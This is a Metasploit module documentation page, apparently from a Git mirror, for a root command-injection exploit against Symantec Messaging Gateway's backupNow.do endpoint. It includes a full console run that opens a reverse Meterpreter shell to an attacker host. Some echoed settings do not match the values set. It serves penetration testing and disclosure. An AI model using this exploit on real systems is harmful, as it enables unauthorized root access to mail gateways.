adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a7e97e50adddeb8bc0cd25e840909deabe8da77b
metasploit-gs/documentation/modules/exploit/linux/http/symantec_messaging_gateway_exec.md
T
Mehmet Ince 6ae540d889 Adding Symantec messaging gateway rce
2017-06-10 12:23:12 +03:00

2.5 KiB
Raw Blame History

Vulnerable Application

This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the web server user which is root.

backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing operating system command. One of the user input is being passed to the service without proper validation. That cause an command injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal command. Thus, you need to configure your own SSH service and set the required parameter during module usage.

Vulnerable Application Installation Steps

Click on the "free trial" button at the following URL. https://www.symantec.com/products/messaging-security/messaging-gateway

You need to complete the reqistration in order to download ISO file. License file will be delivered to your e-mail address

Verification Steps

A successful check of the exploit will look like this:

msf > use exploit/linux/http/symantec_messaging_gateway_exec 
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink